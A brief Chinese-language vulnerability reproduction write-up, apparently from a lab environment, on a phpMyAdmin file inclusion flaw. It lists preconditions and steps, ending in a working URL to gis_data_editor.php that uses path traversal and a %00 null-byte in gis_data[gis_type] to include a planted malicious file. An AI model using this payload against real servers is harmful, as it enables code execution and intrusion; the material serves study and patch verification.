漏洞描述:
其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞
1.已知MySQL用户名和密码登录到phpmyadmin
2.需要截断漏洞配合才能任意包含
3、包含根目录下1.gif等恶意文件
复现过程:
1.访问ip:port
2.访问登陆页面
/pma/gis_data_editor.php
用户名密码登陆pmatest/pmatest (phpMyAdmin)
3.进入以后
记录token
4.构造URL,成功执行文件包含
http://ip:port/pma/gis_data_editor.php?token=a4fac8c22ed7b4ceef5f4357f4846d2d&&gis_data[gis_type]=/../../../../1.gif%00